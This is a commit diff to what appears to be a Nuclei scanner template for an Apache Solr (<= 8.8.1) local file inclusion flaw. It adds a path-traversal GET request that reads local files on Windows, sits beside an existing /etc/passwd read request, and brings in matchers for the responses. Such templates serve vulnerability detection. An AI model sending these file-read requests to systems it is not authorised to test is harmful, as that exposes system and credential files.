Update apache-solr-file-read.yaml

1. The added GET request triggers a file local read on Windows OS. 
2. Matcher added to the Response trigger by 1. 
3. Matcher for other cases (Errors, ie. not found path)

vulnerabilities/apache/apache-solr-file-read.yaml

@@ -2,7 +2,7 @@ id: apache-solr-file-read
 
 info:
   name: Apache Solr <= 8.8.1 - Local File Inclusion
-  author: DhiyaneshDk
+  author: DhiyaneshDk, philippedelteil
   severity: high
   description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion.
   reference:
@@ -23,6 +23,12 @@ requests:
         Accept-Language: en
         Connection: close
         
+      - |
+        GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../&param=ContentStream HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: en
+        Connection: close
+
       - |
         GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1
         Host: {{Hostname}}
@@ -37,14 +43,21 @@ requests:
         regex:
           - '"name"\:"(.*?)"'
 
-    matchers-condition: and
     matchers:
-      - type: status
+      - type: word
-        status:
+        name: "Windows"
-          - 200
+        words:
-
+          - "Windows"
+          - "Users"
+          - "org.apache.solr.handler.DumpRequestHandler"
+        condition: and
       - type: regex
+        name: "Linux"
         regex:
           - "root:.*:0:0:"
+      - type: word
+        name: "Other"
+        words:
+          - "java.io.FileNotFoundException"
   
 # Enhanced by mp on 2022/07/22